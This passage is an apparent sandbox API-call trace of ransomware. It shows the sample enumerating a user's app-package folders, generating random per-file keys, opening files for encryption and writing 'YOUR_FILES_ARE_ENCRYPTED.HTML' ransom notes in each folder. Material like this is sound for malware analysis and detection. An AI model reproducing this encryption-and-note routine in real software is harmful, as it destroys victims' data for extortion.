ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa62f7d48, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xdce7f65a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.264] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.264] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 205 [0120.264] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.264] lstrlenW (lpString=".dat") returned 4 [0120.264] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.264] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.266] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0120.266] GetProcessHeap () returned 0x600000 [0120.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.271] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="F1") returned 2 [0120.271] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="42") returned 2 [0120.272] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="61") returned 2 [0120.272] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="E1") returned 2 [0120.272] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="F0") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="72") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="C5") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="BB") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="24") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="45") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="D1") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="F3") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="71") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="0E") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="F4") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="B2") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="92") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="BD") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="3F") returned 2 [0120.272] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="75") returned 2 [0120.272] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="90") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="DE") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="CC") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="18") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="2A") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="11") returned 2 [0120.272] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="F2") returned 2 [0120.272] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="8B") returned 2 [0120.272] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="BB") returned 2 [0120.272] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="3B") returned 2 [0120.272] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="0A") returned 2 [0120.273] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="75") returned 2 [0120.273] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.273] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.273] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.274] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdcbd0d59, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcbd0d59, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcbd0d59, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.274] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.274] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 210 [0120.274] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.274] lstrlenW (lpString=".LOG1") returned 5 [0120.274] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.274] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdcbd0d59, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcbd0d59, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcbd0d59, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.274] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.274] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 210 [0120.274] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.274] lstrlenW (lpString=".LOG2") returned 5 [0120.274] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.274] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdcbd0d59, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcbd0d59, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcbd0d59, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.274] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.274] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 215 [0120.274] GetProcessHeap () returned 0x600000 [0120.274] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.276] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.277] CloseHandle (hObject=0x320) returned 1 [0120.278] GetProcessHeap () returned 0x600000 [0120.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.278] GetProcessHeap () returned 0x600000 [0120.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.278] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.278] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.278] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 199 [0120.278] GetProcessHeap () returned 0x600000 [0120.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.281] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.282] CloseHandle (hObject=0x31c) returned 1 [0120.282] GetProcessHeap () returned 0x600000 [0120.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.282] GetProcessHeap () returned 0x600000 [0120.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.282] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.282] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.282] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState") returned 111 [0120.282] GetProcessHeap () returned 0x600000 [0120.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.283] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState" [0120.283] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\*" [0120.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.283] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.283] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.283] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.283] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0120.283] GetProcessHeap () returned 0x600000 [0120.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.284] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.286] CloseHandle (hObject=0x31c) returned 1 [0120.286] GetProcessHeap () returned 0x600000 [0120.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.286] GetProcessHeap () returned 0x600000 [0120.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.286] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.286] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.286] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings") returned 107 [0120.286] GetProcessHeap () returned 0x600000 [0120.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.286] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings" [0120.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\*" [0120.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe469a1da, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe469a1da, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.287] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.287] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 120 [0120.287] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.287] lstrlenW (lpString=".lock") returned 5 [0120.287] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa634258b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa634258b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.287] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.287] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat") returned 120 [0120.287] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.287] lstrlenW (lpString=".dat") returned 4 [0120.287] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.287] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.288] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.288] GetProcessHeap () returned 0x600000 [0120.288] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0120.300] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F6") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="DF") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="98") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="67") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="0D") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E7") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="06") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C8") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="37") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="0E") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="75") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="0C") returned 2 [0120.300] wsprintfW (in: 